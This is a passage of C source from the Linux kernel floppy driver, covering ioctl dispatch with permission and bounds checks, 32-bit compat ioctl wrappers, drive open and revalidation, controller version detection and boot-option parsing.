FDRESET,
FDGETFDCSTAT,
FDWERRORCLR,
FDWERRORGET,
FDRAWCMD,
FDEJECT,
FDTWADDLE
};
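/*
 * Translate an old-style ioctl number into the matching entry of
 * ioctl_table[] (same type/number bits), returning the caller's data
 * size and rejecting requests larger than the structure now expected.
 */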
static int normalize_ioctl(unsigned int *cmd, int *size)
{
int i;
for (i = 0; i < ARRAY_SIZE(ioctl_table); i++) {
if ((*cmd & 0xffff) == (ioctl_table[i] & 0xffff)) {
*size = _IOC_SIZE(*cmd);
*cmd = ioctl_table[i];
if (*size > _IOC_SIZE(*cmd)) {
pr_info("ioctl not yet supported\n");
return -EFAULT;
}
return 0;
}
}
return -EINVAL;
}
static int get_floppy_geometry(int drive, int type, struct floppy_struct **g)
{
if (type)
*g = &floppy_type[type];
else {
if (lock_fdc(drive))
return -EINTR;
if (poll_drive(false, 0) == -EINTR)
return -EINTR;
process_fd_request();
*g = current_type[drive];
}
if (!*g)
return -ENODEV;
return 0;
}
static int fd_getgeo(struct block_device *bdev, struct hd_geometry *geo)
{
int drive = (long)bdev->bd_disk->private_data;
int type = ITYPE(drive_state[drive].fd_device);
struct floppy_struct *g;
int ret;
ret = get_floppy_geometry(drive, type, &g);
if (ret)
return ret;
geo->heads = g->head;
geo->sectors = g->sect;
geo->cylinders = g->track;
return 0;
}
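/*
 * Reject user-supplied drive parameters whose autodetect entries or
 * native_format would index outside the floppy_type[] table.
 */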
static bool valid_floppy_drive_params(const short autodetect[8],
int native_format)
{
size_t floppy_type_size = ARRAY_SIZE(floppy_type);
size_t i = 0;
for (i = 0; i < 8; ++i) {
if (autodetect[i] < 0 ||
autodetect[i] >= floppy_type_size)
return false;
}
if (native_format < 0 || native_format >= floppy_type_size)
return false;
return true;
}
static int fd_locked_ioctl(struct block_device *bdev, fmode_t mode, unsigned int cmd,
unsigned long param)
{
int drive = (long)bdev->bd_disk->private_data;
int type = ITYPE(UDRS->fd_device);
int i;
int ret;
int size;
union inparam {
struct floppy_struct g; /* geometry */
struct format_descr f;
struct floppy_max_errors max_errors;
struct floppy_drive_params dp;
} inparam; /* parameters coming from user space */
const void *outparam; /* parameters passed back to user space */
/* convert compatibility eject ioctls into floppy eject ioctl.
* We do this in order to provide a means to eject floppy disks before
* installing the new fdutils package */
if (cmd == CDROMEJECT || /* CD-ROM eject */
cmd == 0x6470) { /* SunOS floppy eject */
DPRINT("obsolete eject ioctl\n");
DPRINT("please use floppycontrol --eject\n");
cmd = FDEJECT;
}
if (!((cmd & 0xff00) == 0x0200))
return -EINVAL;
/* convert the old style command into a new style command */
ret = normalize_ioctl(&cmd, &size);
if (ret)
return ret;
/* permission checks */
if (((cmd & 0x40) && !(mode & (FMODE_WRITE | FMODE_WRITE_IOCTL))) ||
((cmd & 0x80) && !capable(CAP_SYS_ADMIN)))
return -EPERM;
if (WARN_ON(size < 0 || size > sizeof(inparam)))
return -EINVAL;
/* copyin */
memset(&inparam, 0, sizeof(inparam));
if (_IOC_DIR(cmd) & _IOC_WRITE) {
ret = fd_copyin((void __user *)param, &inparam, size);
if (ret)
return ret;
}
switch (cmd) {
case FDEJECT:
if (UDRS->fd_ref != 1)
/* somebody else has this drive open */
return -EBUSY;
if (lock_fdc(drive))
return -EINTR;
/* do the actual eject. Fails on
* non-Sparc architectures */
ret = fd_eject(UNIT(drive));
set_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
set_bit(FD_VERIFY_BIT, &UDRS->flags);
process_fd_request();
return ret;
case FDCLRPRM:
if (lock_fdc(drive))
return -EINTR;
current_type[drive] = NULL;
floppy_sizes[drive] = MAX_DISK_SIZE << 1;
UDRS->keep_data = 0;
return invalidate_drive(bdev);
case FDSETPRM:
case FDDEFPRM:
return set_geometry(cmd, &inparam.g, drive, type, bdev);
case FDGETPRM:
ret = get_floppy_geometry(drive, type,
(struct floppy_struct **)&outparam);
if (ret)
return ret;
memcpy(&inparam.g, outparam,
offsetof(struct floppy_struct, name));
outparam = &inparam.g;
break;
case FDMSGON:
UDP->flags |= FTD_MSG;
return 0;
case FDMSGOFF:
UDP->flags &= ~FTD_MSG;
return 0;
case FDFMTBEG:
if (lock_fdc(drive))
return -EINTR;
if (poll_drive(true, FD_RAW_NEED_DISK) == -EINTR)
return -EINTR;
ret = UDRS->flags;
process_fd_request();
if (ret & FD_VERIFY)
return -ENODEV;
if (!(ret & FD_DISK_WRITABLE))
return -EROFS;
return 0;
case FDFMTTRK:
if (UDRS->fd_ref != 1)
return -EBUSY;
return do_format(drive, &inparam.f);
case FDFMTEND:
case FDFLUSH:
if (lock_fdc(drive))
return -EINTR;
return invalidate_drive(bdev);
case FDSETEMSGTRESH:
UDP->max_errors.reporting = (unsigned short)(param & 0x0f);
return 0;
case FDGETMAXERRS:
outparam = &UDP->max_errors;
break;
case FDSETMAXERRS:
UDP->max_errors = inparam.max_errors;
break;
case FDGETDRVTYP:
outparam = drive_name(type, drive);
SUPBOUND(size, strlen((const char *)outparam) + 1);
break;
case FDSETDRVPRM:
if (!valid_floppy_drive_params(inparam.dp.autodetect,
inparam.dp.native_format))
return -EINVAL;
*UDP = inparam.dp;
break;
case FDGETDRVPRM:
outparam = UDP;
break;
case FDPOLLDRVSTAT:
if (lock_fdc(drive))
return -EINTR;
if (poll_drive(true, FD_RAW_NEED_DISK) == -EINTR)
return -EINTR;
process_fd_request();
/* fall through */
case FDGETDRVSTAT:
outparam = UDRS;
break;
case FDRESET:
return user_reset_fdc(drive, (int)param, true);
case FDGETFDCSTAT:
outparam = UFDCS;
break;
case FDWERRORCLR:
memset(UDRWE, 0, sizeof(*UDRWE));
return 0;
case FDWERRORGET:
outparam = UDRWE;
break;
case FDRAWCMD:
if (type)
return -EINVAL;
if (lock_fdc(drive))
return -EINTR;
set_floppy(drive);
i = raw_cmd_ioctl(cmd, (void __user *)param);
if (i == -EINTR)
return -EINTR;
process_fd_request();
return i;
case FDTWADDLE:
if (lock_fdc(drive))
return -EINTR;
twaddle();
process_fd_request();
return 0;
default:
return -EINVAL;
}
if (_IOC_DIR(cmd) & _IOC_READ)
return fd_copyout((void __user *)param, outparam, size);
return 0;
}
static int fd_ioctl(struct block_device *bdev, fmode_t mode,
unsigned int cmd, unsigned long param)
{
int ret;
mutex_lock(&floppy_mutex);
ret = fd_locked_ioctl(bdev, mode, cmd, param);
mutex_unlock(&floppy_mutex);
return ret;
}
#ifdef CONFIG_COMPAT
struct compat_floppy_drive_params {
char cmos;
compat_ulong_t max_dtr;
compat_ulong_t hlt;
compat_ulong_t hut;
compat_ulong_t srt;
compat_ulong_t spinup;
compat_ulong_t spindown;
unsigned char spindown_offset;
unsigned char select_delay;
unsigned char rps;
unsigned char tracks;
compat_ulong_t timeout;
unsigned char interleave_sect;
struct floppy_max_errors max_errors;
char flags;
char read_track;
short autodetect[8];
compat_int_t checkfreq;
compat_int_t native_format;
};
struct compat_floppy_drive_struct {
signed char flags;
compat_ulong_t spinup_date;
compat_ulong_t select_date;
compat_ulong_t first_read_date;
short probed_format;
short track;
short maxblock;
short maxtrack;
compat_int_t generation;
compat_int_t keep_data;
compat_int_t fd_ref;
compat_int_t fd_device;
compat_int_t last_checked;
compat_caddr_t dmabuf;
compat_int_t bufblocks;
};
struct compat_floppy_fdc_state {
compat_int_t spec1;
compat_int_t spec2;
compat_int_t dtr;
unsigned char version;
unsigned char dor;
compat_ulong_t address;
unsigned int rawcmd:2;
unsigned int reset:1;
unsigned int need_configure:1;
unsigned int perp_mode:2;
unsigned int has_fifo:1;
unsigned int driver_version;
unsigned char track[4];
};
struct compat_floppy_write_errors {
unsigned int write_errors;
compat_ulong_t first_error_sector;
compat_int_t first_error_generation;
compat_ulong_t last_error_sector;
compat_int_t last_error_generation;
compat_uint_t badness;
};
#define FDSETPRM32 _IOW(2, 0x42, struct compat_floppy_struct)
#define FDDEFPRM32 _IOW(2, 0x43, struct compat_floppy_struct)
#define FDSETDRVPRM32 _IOW(2, 0x90, struct compat_floppy_drive_params)
#define FDGETDRVPRM32 _IOR(2, 0x11, struct compat_floppy_drive_params)
#define FDGETDRVSTAT32 _IOR(2, 0x12, struct compat_floppy_drive_struct)
#define FDPOLLDRVSTAT32 _IOR(2, 0x13, struct compat_floppy_drive_struct)
#define FDGETFDCSTAT32 _IOR(2, 0x15, struct compat_floppy_fdc_state)
#define FDWERRORGET32 _IOR(2, 0x17, struct compat_floppy_write_errors)
static int compat_set_geometry(struct block_device *bdev, fmode_t mode, unsigned int cmd,
struct compat_floppy_struct __user *arg)
{
struct floppy_struct v;
int drive, type;
int err;
BUILD_BUG_ON(offsetof(struct floppy_struct, name) !=
offsetof(struct compat_floppy_struct, name));
if (!(mode & (FMODE_WRITE | FMODE_WRITE_IOCTL)))
return -EPERM;
memset(&v, 0, sizeof(struct floppy_struct));
if (copy_from_user(&v, arg, offsetof(struct floppy_struct, name)))
return -EFAULT;
mutex_lock(&floppy_mutex);
drive = (long)bdev->bd_disk->private_data;
type = ITYPE(UDRS->fd_device);
err = set_geometry(cmd == FDSETPRM32 ? FDSETPRM : FDDEFPRM,
&v, drive, type, bdev);
mutex_unlock(&floppy_mutex);
return err;
}
static int compat_get_prm(int drive,
struct compat_floppy_struct __user *arg)
{
struct compat_floppy_struct v;
struct floppy_struct *p;
int err;
memset(&v, 0, sizeof(v));
mutex_lock(&floppy_mutex);
err = get_floppy_geometry(drive, ITYPE(UDRS->fd_device), &p);
if (err) {
mutex_unlock(&floppy_mutex);
return err;
}
memcpy(&v, p, offsetof(struct floppy_struct, name));
mutex_unlock(&floppy_mutex);
if (copy_to_user(arg, &v, sizeof(struct compat_floppy_struct)))
return -EFAULT;
return 0;
}
static int compat_setdrvprm(int drive,
struct compat_floppy_drive_params __user *arg)
{
struct compat_floppy_drive_params v;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
if (copy_from_user(&v, arg, sizeof(struct compat_floppy_drive_params)))
return -EFAULT;
if (!valid_floppy_drive_params(v.autodetect, v.native_format))
return -EINVAL;
mutex_lock(&floppy_mutex);
UDP->cmos = v.cmos;
UDP->max_dtr = v.max_dtr;
UDP->hlt = v.hlt;
UDP->hut = v.hut;
UDP->srt = v.srt;
UDP->spinup = v.spinup;
UDP->spindown = v.spindown;
UDP->spindown_offset = v.spindown_offset;
UDP->select_delay = v.select_delay;
UDP->rps = v.rps;
UDP->tracks = v.tracks;
UDP->timeout = v.timeout;
UDP->interleave_sect = v.interleave_sect;
UDP->max_errors = v.max_errors;
UDP->flags = v.flags;
UDP->read_track = v.read_track;
memcpy(UDP->autodetect, v.autodetect, sizeof(v.autodetect));
UDP->checkfreq = v.checkfreq;
UDP->native_format = v.native_format;
mutex_unlock(&floppy_mutex);
return 0;
}
static int compat_getdrvprm(int drive,
struct compat_floppy_drive_params __user *arg)
{
struct compat_floppy_drive_params v;
memset(&v, 0, sizeof(struct compat_floppy_drive_params));
mutex_lock(&floppy_mutex);
v.cmos = UDP->cmos;
v.max_dtr = UDP->max_dtr;
v.hlt = UDP->hlt;
v.hut = UDP->hut;
v.srt = UDP->srt;
v.spinup = UDP->spinup;
v.spindown = UDP->spindown;
v.spindown_offset = UDP->spindown_offset;
v.select_delay = UDP->select_delay;
v.rps = UDP->rps;
v.tracks = UDP->tracks;
v.timeout = UDP->timeout;
v.interleave_sect = UDP->interleave_sect;
v.max_errors = UDP->max_errors;
v.flags = UDP->flags;
v.read_track = UDP->read_track;
memcpy(v.autodetect, UDP->autodetect, sizeof(v.autodetect));
v.checkfreq = UDP->checkfreq;
v.native_format = UDP->native_format;
mutex_unlock(&floppy_mutex);
if (copy_to_user(arg, &v, sizeof(struct compat_floppy_drive_params)))
return -EFAULT;
return 0;
}
static int compat_getdrvstat(int drive, bool poll,
struct compat_floppy_drive_struct __user *arg)
{
struct compat_floppy_drive_struct v;
memset(&v, 0, sizeof(struct compat_floppy_drive_struct));
mutex_lock(&floppy_mutex);
if (poll) {
if (lock_fdc(drive))
goto Eintr;
if (poll_drive(true, FD_RAW_NEED_DISK) == -EINTR)
goto Eintr;
process_fd_request();
}
v.spinup_date = UDRS->spinup_date;
v.select_date = UDRS->select_date;
v.first_read_date = UDRS->first_read_date;
v.probed_format = UDRS->probed_format;
v.track = UDRS->track;
v.maxblock = UDRS->maxblock;
v.maxtrack = UDRS->maxtrack;
v.generation = UDRS->generation;
v.keep_data = UDRS->keep_data;
v.fd_ref = UDRS->fd_ref;
v.fd_device = UDRS->fd_device;
v.last_checked = UDRS->last_checked;
v.dmabuf = (uintptr_t)UDRS->dmabuf;
v.bufblocks = UDRS->bufblocks;
mutex_unlock(&floppy_mutex);
if (copy_to_user(arg, &v, sizeof(struct compat_floppy_drive_struct)))
return -EFAULT;
return 0;
Eintr:
mutex_unlock(&floppy_mutex);
return -EINTR;
}
static int compat_getfdcstat(int drive,
struct compat_floppy_fdc_state __user *arg)
{
struct compat_floppy_fdc_state v32;
struct floppy_fdc_state v;
mutex_lock(&floppy_mutex);
v = *UFDCS;
mutex_unlock(&floppy_mutex);
memset(&v32, 0, sizeof(struct compat_floppy_fdc_state));
v32.spec1 = v.spec1;
v32.spec2 = v.spec2;
v32.dtr = v.dtr;
v32.version = v.version;
v32.dor = v.dor;
v32.address = v.address;
v32.rawcmd = v.rawcmd;
v32.reset = v.reset;
v32.need_configure = v.need_configure;
v32.perp_mode = v.perp_mode;
v32.has_fifo = v.has_fifo;
v32.driver_version = v.driver_version;
memcpy(v32.track, v.track, 4);
if (copy_to_user(arg, &v32, sizeof(struct compat_floppy_fdc_state)))
return -EFAULT;
return 0;
}
static int compat_werrorget(int drive,
struct compat_floppy_write_errors __user *arg)
{
struct compat_floppy_write_errors v32;
struct floppy_write_errors v;
memset(&v32, 0, sizeof(struct compat_floppy_write_errors));
mutex_lock(&floppy_mutex);
v = *UDRWE;
mutex_unlock(&floppy_mutex);
v32.write_errors = v.write_errors;
v32.first_error_sector = v.first_error_sector;
v32.first_error_generation = v.first_error_generation;
v32.last_error_sector = v.last_error_sector;
v32.last_error_generation = v.last_error_generation;
v32.badness = v.badness;
if (copy_to_user(arg, &v32, sizeof(struct compat_floppy_write_errors)))
return -EFAULT;
return 0;
}
static int fd_compat_ioctl(struct block_device *bdev, fmode_t mode, unsigned int cmd,
unsigned long param)
{
int drive = (long)bdev->bd_disk->private_data;
switch (cmd) {
case FDMSGON:
case FDMSGOFF:
case FDSETEMSGTRESH:
case FDFLUSH:
case FDWERRORCLR:
case FDEJECT:
case FDCLRPRM:
case FDFMTBEG:
case FDRESET:
case FDTWADDLE:
return fd_ioctl(bdev, mode, cmd, param);
case FDSETMAXERRS:
case FDGETMAXERRS:
case FDGETDRVTYP:
case FDFMTEND:
case FDFMTTRK:
case FDRAWCMD:
return fd_ioctl(bdev, mode, cmd,
(unsigned long)compat_ptr(param));
case FDSETPRM32:
case FDDEFPRM32:
return compat_set_geometry(bdev, mode, cmd, compat_ptr(param));
case FDGETPRM32:
return compat_get_prm(drive, compat_ptr(param));
case FDSETDRVPRM32:
return compat_setdrvprm(drive, compat_ptr(param));
case FDGETDRVPRM32:
return compat_getdrvprm(drive, compat_ptr(param));
case FDPOLLDRVSTAT32:
return compat_getdrvstat(drive, true, compat_ptr(param));
case FDGETDRVSTAT32:
return compat_getdrvstat(drive, false, compat_ptr(param));
case FDGETFDCSTAT32:
return compat_getfdcstat(drive, compat_ptr(param));
case FDWERRORGET32:
return compat_werrorget(drive, compat_ptr(param));
}
return -EINVAL;
}
#endif
static void __init config_types(void)
{
bool has_drive = false;
int drive;
/* read drive info out of physical CMOS */
drive = 0;
if (!UDP->cmos)
UDP->cmos = FLOPPY0_TYPE;
drive = 1;
if (!UDP->cmos && FLOPPY1_TYPE)
UDP->cmos = FLOPPY1_TYPE;
/* FIXME: additional physical CMOS drive detection should go here */
for (drive = 0; drive < N_DRIVE; drive++) {
unsigned int type = UDP->cmos;
struct floppy_drive_params *params;
const char *name = NULL;
char temparea[32];
if (type < ARRAY_SIZE(default_drive_params)) {
params = &default_drive_params[type].params;
if (type) {
name = default_drive_params[type].name;
allowed_drive_mask |= 1 << drive;
} else
allowed_drive_mask &= ~(1 << drive);
} else {
params = &default_drive_params[0].params;
snprintf(temparea, sizeof(temparea),
"unknown type %d (usb?)", type);
name = temparea;
}
if (name) {
const char *prepend;
if (!has_drive) {
prepend = "";
has_drive = true;
pr_info("Floppy drive(s):");
} else {
prepend = ",";
}
pr_cont("%s fd%d is %s", prepend, drive, name);
}
*UDP = *params;
}
if (has_drive)
pr_cont("\n");
}
static void floppy_release(struct gendisk *disk, fmode_t mode)
{
int drive = (long)disk->private_data;
mutex_lock(&floppy_mutex);
mutex_lock(&open_lock);
if (!UDRS->fd_ref--) {
DPRINT("floppy_release with fd_ref == 0");
UDRS->fd_ref = 0;
}
if (!UDRS->fd_ref)
opened_bdev[drive] = NULL;
mutex_unlock(&open_lock);
mutex_unlock(&floppy_mutex);
}
/*
 * floppy_open checks for aliasing (/dev/fd0 can be the same as
* /dev/PS0 etc), and disallows simultaneous access to the same
* drive with different device numbers.
*/
static int floppy_open(struct block_device *bdev, fmode_t mode)
{
int drive = (long)bdev->bd_disk->private_data;
int old_dev, new_dev;
int try;
int res = -EBUSY;
char *tmp;
mutex_lock(&floppy_mutex);
mutex_lock(&open_lock);
old_dev = UDRS->fd_device;
if (opened_bdev[drive] && opened_bdev[drive] != bdev)
goto out2;
if (!UDRS->fd_ref && (UDP->flags & FD_BROKEN_DCL)) {
set_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
set_bit(FD_VERIFY_BIT, &UDRS->flags);
}
UDRS->fd_ref++;
opened_bdev[drive] = bdev;
res = -ENXIO;
if (!floppy_track_buffer) {
/* if opening an ED drive, reserve a big buffer,
* else reserve a small one */
if ((UDP->cmos == 6) || (UDP->cmos == 5))
try = 64; /* Only 48 actually useful */
else
try = 32; /* Only 24 actually useful */
tmp = (char *)fd_dma_mem_alloc(1024 * try);
if (!tmp && !floppy_track_buffer) {
try >>= 1; /* buffer only one side */
INFBOUND(try, 16);
tmp = (char *)fd_dma_mem_alloc(1024 * try);
}
if (!tmp && !floppy_track_buffer)
fallback_on_nodma_alloc(&tmp, 2048 * try);
if (!tmp && !floppy_track_buffer) {
DPRINT("Unable to allocate DMA memory\n");
goto out;
}
if (floppy_track_buffer) {
if (tmp)
fd_dma_mem_free((unsigned long)tmp, try * 1024);
} else {
buffer_min = buffer_max = -1;
floppy_track_buffer = tmp;
max_buffer_sectors = try;
}
}
new_dev = MINOR(bdev->bd_dev);
UDRS->fd_device = new_dev;
set_capacity(disks[drive], floppy_sizes[new_dev]);
if (old_dev != -1 && old_dev != new_dev) {
if (buffer_drive == drive)
buffer_track = -1;
}
if (UFDCS->rawcmd == 1)
UFDCS->rawcmd = 2;
if (!(mode & FMODE_NDELAY)) {
if (mode & (FMODE_READ|FMODE_WRITE)) {
UDRS->last_checked = 0;
clear_bit(FD_OPEN_SHOULD_FAIL_BIT, &UDRS->flags);
check_disk_change(bdev);
if (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags))
goto out;
if (test_bit(FD_OPEN_SHOULD_FAIL_BIT, &UDRS->flags))
goto out;
}
res = -EROFS;
if ((mode & FMODE_WRITE) &&
!test_bit(FD_DISK_WRITABLE_BIT, &UDRS->flags))
goto out;
}
mutex_unlock(&open_lock);
mutex_unlock(&floppy_mutex);
return 0;
out:
UDRS->fd_ref--;
if (!UDRS->fd_ref)
opened_bdev[drive] = NULL;
out2:
mutex_unlock(&open_lock);
mutex_unlock(&floppy_mutex);
return res;
}
/*
* Check if the disk has been changed or if a change has been faked.
*/
static unsigned int floppy_check_events(struct gendisk *disk,
unsigned int clearing)
{
int drive = (long)disk->private_data;
if (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags) ||
test_bit(FD_VERIFY_BIT, &UDRS->flags))
return DISK_EVENT_MEDIA_CHANGE;
if (time_after(jiffies, UDRS->last_checked + UDP->checkfreq)) {
if (lock_fdc(drive))
return 0;
poll_drive(false, 0);
process_fd_request();
}
if (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags) ||
test_bit(FD_VERIFY_BIT, &UDRS->flags) ||
test_bit(drive, &fake_change) ||
drive_no_geom(drive))
return DISK_EVENT_MEDIA_CHANGE;
return 0;
}
/*
* This implements "read block 0" for floppy_revalidate().
* Needed for format autodetection, checking whether there is
* a disk in the drive, and whether that disk is writable.
*/
struct rb0_cbdata {
int drive;
struct completion complete;
};
static void floppy_rb0_cb(struct bio *bio)
{
struct rb0_cbdata *cbdata = (struct rb0_cbdata *)bio->bi_private;
int drive = cbdata->drive;
if (bio->bi_status) {
pr_info("floppy: error %d while reading block 0\n",
bio->bi_status);
set_bit(FD_OPEN_SHOULD_FAIL_BIT, &UDRS->flags);
}
complete(&cbdata->complete);
}
static int __floppy_read_block_0(struct block_device *bdev, int drive)
{
struct bio bio;
struct bio_vec bio_vec;
struct page *page;
struct rb0_cbdata cbdata;
size_t size;
page = alloc_page(GFP_NOIO);
if (!page) {
process_fd_request();
return -ENOMEM;
}
size = bdev->bd_block_size;
if (!size)
size = 1024;
cbdata.drive = drive;
bio_init(&bio, &bio_vec, 1);
bio_set_dev(&bio, bdev);
bio_add_page(&bio, page, size, 0);
bio.bi_iter.bi_sector = 0;
bio.bi_flags |= (1 << BIO_QUIET);
bio.bi_private = &cbdata;
bio.bi_end_io = floppy_rb0_cb;
bio_set_op_attrs(&bio, REQ_OP_READ, 0);
init_completion(&cbdata.complete);
submit_bio(&bio);
process_fd_request();
wait_for_completion(&cbdata.complete);
__free_page(page);
return 0;
}
/* revalidate the floppy disk, i.e. trigger format autodetection by reading
* the bootblock (block 0). "Autodetection" is also needed to check whether
* there is a disk in the drive at all... Thus we also do it for fixed
* geometry formats */
static int floppy_revalidate(struct gendisk *disk)
{
int drive = (long)disk->private_data;
int cf;
int res = 0;
if (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags) ||
test_bit(FD_VERIFY_BIT, &UDRS->flags) ||
test_bit(drive, &fake_change) ||
drive_no_geom(drive)) {
if (WARN(atomic_read(&usage_count) == 0,
"VFS: revalidate called on non-open device.\n"))
return -EFAULT;
res = lock_fdc(drive);
if (res)
return res;
cf = (test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags) ||
test_bit(FD_VERIFY_BIT, &UDRS->flags));
if (!(cf || test_bit(drive, &fake_change) || drive_no_geom(drive))) {
process_fd_request(); /*already done by another thread */
return 0;
}
UDRS->maxblock = 0;
UDRS->maxtrack = 0;
if (buffer_drive == drive)
buffer_track = -1;
clear_bit(drive, &fake_change);
clear_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
if (cf)
UDRS->generation++;
if (drive_no_geom(drive)) {
/* auto-sensing */
res = __floppy_read_block_0(opened_bdev[drive], drive);
} else {
if (cf)
poll_drive(false, FD_RAW_NEED_DISK);
process_fd_request();
}
}
set_capacity(disk, floppy_sizes[UDRS->fd_device]);
return res;
}
static const struct block_device_operations floppy_fops = {
.owner = THIS_MODULE,
.open = floppy_open,
.release = floppy_release,
.ioctl = fd_ioctl,
.getgeo = fd_getgeo,
.check_events = floppy_check_events,
.revalidate_disk = floppy_revalidate,
#ifdef CONFIG_COMPAT
.compat_ioctl = fd_compat_ioctl,
#endif
};
/*
* Floppy Driver initialization
* =============================
*/
/* Determine the floppy disk controller type */
/* This routine was written by David C. Niemi */
static char __init get_fdc_version(void)
{
int r;
output_byte(FD_DUMPREGS); /* 82072 and better know DUMPREGS */
if (FDCS->reset)
return FDC_NONE;
r = result();
if (r <= 0x00)
return FDC_NONE; /* No FDC present ??? */
if ((r == 1) && (reply_buffer[0] == 0x80)) {
pr_info("FDC %d is an 8272A\n", fdc);
return FDC_8272A; /* 8272a/765 don't know DUMPREGS */
}
if (r != 10) {
pr_info("FDC %d init: DUMPREGS: unexpected return of %d bytes.\n",
fdc, r);
return FDC_UNKNOWN;
}
if (!fdc_configure()) {
pr_info("FDC %d is an 82072\n", fdc);
return FDC_82072; /* 82072 doesn't know CONFIGURE */
}
output_byte(FD_PERPENDICULAR);
if (need_more_output() == MORE_OUTPUT) {
output_byte(0);
} else {
pr_info("FDC %d is an 82072A\n", fdc);
return FDC_82072A; /* 82072A as found on Sparcs. */
}
output_byte(FD_UNLOCK);
r = result();
if ((r == 1) && (reply_buffer[0] == 0x80)) {
pr_info("FDC %d is a pre-1991 82077\n", fdc);
return FDC_82077_ORIG; /* Pre-1991 82077, doesn't know
* LOCK/UNLOCK */
}
if ((r != 1) || (reply_buffer[0] != 0x00)) {
pr_info("FDC %d init: UNLOCK: unexpected return of %d bytes.\n",
fdc, r);
return FDC_UNKNOWN;
}
output_byte(FD_PARTID);
r = result();
if (r != 1) {
pr_info("FDC %d init: PARTID: unexpected return of %d bytes.\n",
fdc, r);
return FDC_UNKNOWN;
}
if (reply_buffer[0] == 0x80) {
pr_info("FDC %d is a post-1991 82077\n", fdc);
return FDC_82077; /* Revised 82077AA passes all the tests */
}
switch (reply_buffer[0] >> 5) {
case 0x0:
/* Either a 82078-1 or a 82078SL running at 5Volt */
pr_info("FDC %d is an 82078.\n", fdc);
return FDC_82078;
case 0x1:
pr_info("FDC %d is a 44pin 82078\n", fdc);
return FDC_82078;
case 0x2:
pr_info("FDC %d is a S82078B\n", fdc);
return FDC_S82078B;
case 0x3:
pr_info("FDC %d is a National Semiconductor PC87306\n", fdc);
return FDC_87306;
default:
pr_info("FDC %d init: 82078 variant with unknown PARTID=%d.\n",
fdc, reply_buffer[0] >> 5);
return FDC_82078_UNKN;
}
} /* get_fdc_version */
/* lilo configuration */
static void __init floppy_set_flags(int *ints, int param, int param2)
{
int i;
for (i = 0; i < ARRAY_SIZE(default_drive_params); i++) {
if (param)
default_drive_params[i].params.flags |= param2;
else
default_drive_params[i].params.flags &= ~param2;
}
DPRINT("%s flag 0x%x\n", param2 ? "Setting" : "Clearing", param);
}
static void __init daring(int *ints, int param, int param2)
{
int i;
for (i = 0; i < ARRAY_SIZE(default_drive_params); i++) {
if (param) {
default_drive_params[i].params.select_delay = 0;
default_drive_params[i].params.flags |=
FD_SILENT_DCL_CLEAR;
} else {
default_drive_params[i].params.select_delay =
2 * HZ / 100;
default_drive_params[i].params.flags &=
~FD_SILENT_DCL_CLEAR;
}
}
DPRINT("Assuming %s floppy hardware\n", param ? "standard" : "broken");
}
static void __init set_cmos(int *ints, int dummy, int dummy2)
{
int current_drive = 0;
if (ints[0] != 2) {
DPRINT("wrong number of parameters for CMOS\n");
return;
}
current_drive = ints[1];
if (current_drive < 0 || current_drive >= 8) {
DPRINT("bad drive for set_cmos\n");
return;
}
#if N_FDC > 1
if (current_drive >= 4 && !FDC2)
FDC2 = 0x370;
#endif
DP->cmos = ints[2];
DPRINT("setting CMOS code to %d\n", ints[2]);
}
static struct param_table {
const char *name;
void (*fn) (int *ints, int param, int param2);
int *var;
int def_param;
int param2;
} config_params[] __initdata = {
{"allowed_drive_mask", NULL, &allowed_drive_mask, 0xff, 0}, /* obsolete */
{"all_drives", NULL, &allowed_drive_mask, 0xff, 0}, /* obsolete */
{"asus_pci", NULL, &allowed_drive_mask, 0x33, 0},
{"irq", NULL, &FLOPPY_IRQ, 6, 0},
{"dma", NULL, &FLOPPY_DMA, 2, 0},
{"daring", daring, NULL, 1, 0},
#if N_FDC > 1
{"two_fdc", NULL, &FDC2, 0x370, 0},
{"one_fdc", NULL, &FDC2, 0, 0},
#endif
{"thinkpad", floppy_set_flags, NULL, 1, FD_INVERTED_DCL},
{"broken_dcl", floppy_set_flags, NULL, 1, FD_BROKEN_DCL},
{"messages", floppy_set_flags, NULL, 1, FTD_MSG},
{"silent_dcl_clear", floppy_set_flags, NULL, 1, FD_SILENT_DCL_CLEAR},
{"debug", floppy_set_flags, NULL, 1, FD_DEBUG},
{"nodma", NULL, &can_use_virtual_dma, 1, 0},
{"omnibook", NULL, &can_use_virtual_dma, 1, 0},
{"yesdma", NULL, &can_use_virtual_dma, 0, 0},
{"fifo_depth", NULL, &fifo_depth, 0xa, 0},
{"nofifo", NULL, &no_fifo, 0x20, 0},
{"usefifo", NULL, &no_fifo, 0, 0},
{"cmos", set_cmos, NULL, 0, 0},
{"slow", NULL, &slow_floppy, 1, 0},
{"unexpected_interrupts", NULL, &print_unex, 1, 0},
{"no_unexpected_interrupts", NULL, &print_unex, 0, 0},
{"L40SX", NULL, &print_unex, 0, 0}
EXTRA_FLOPPY_PARAMS
};
static int __init floppy_setup(char *str)
{
int i;
int param;
int ints[11];
str = get_options(str, ARRAY_SIZE(ints), ints);
if (str) {
for (i = 0; i < ARRAY_SIZE(config_params); i++) {
if (strcmp(str, config_params[i].name) == 0) {
if (ints[0])
param = ints[1];
else
param = config_params[i].def_param;
if (config_params[i].fn)
config_params[i].fn(ints, param,
config_params[i].
param2);
if (config_params[i].var) {
DPRINT("%s=%d\n", str, param);
*config_params[i].var = param;
}
return 1;
}
}
}
if (str) {
DPRINT("unknown floppy option [%s]\n", str);
DPRINT("allowed options are:");
for (i = 0; i < ARRAY_SIZE(config_params); i++)
pr_cont(" %s", config_params[i].name);
pr_cont("\n");
} else
DPRINT("botched floppy option\n");
DPRINT("Read Documentation/blockdev/floppy.txt\n");
return 0;
}
static int have_no_fdc = -ENODEV;
static ssize_t floppy_cmos_show(struct device *dev,
struct device_attribute *attr, char *buf)
{
struct platform_device *p = to_platform_device(dev);
int drive;
drive = p->id;
return sprintf(buf, "%X\n", UDP->cmos);
}
static DEVICE_ATTR(cmos, 0444, floppy_cmos_show, NULL);
static struct attribute *floppy_dev_attrs[] = {
&dev_attr_cmos.attr,
NULL
};
ATTRIBUTE_GROUPS(floppy_dev);
static void floppy_device_release(struct device *dev)
{
}
static int floppy_resume(struct device *dev)
